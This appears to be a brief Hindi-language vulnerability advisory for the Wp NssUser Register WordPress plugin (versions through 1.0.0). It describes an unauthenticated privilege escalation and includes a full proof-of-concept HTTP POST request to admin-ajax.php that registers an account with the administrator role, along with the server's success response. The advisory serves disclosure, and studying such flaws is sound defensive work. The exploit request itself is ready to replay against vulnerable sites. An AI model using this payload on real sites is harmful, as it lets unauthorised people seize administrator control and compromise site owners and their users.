
Wp NssUser Register <= 1.0.0 - बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
Wp NssUser Register <= 1.0.0 - अनप्रमाणित विशेषाधिकार वृद्धि
WordPress के लिए Wp NssUser Register प्लगइन 1.0.0 तक (और 1.0.0 सहित) सभी संस्करणों में विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है। इससे अनप्रमाणित हमलावरों के लिए साइट पर व्यवस्थापक के रूप में पंजीकरण करना संभव हो जाता है।
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Referer: http://example.com/
action=nssTheme_registration_form&rgName=admin2&[email protected]&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass
<p>successful, just Check this: </p> <a href="https://wp-dev.ddev.site/wp-login.php" title="Login">Login</a>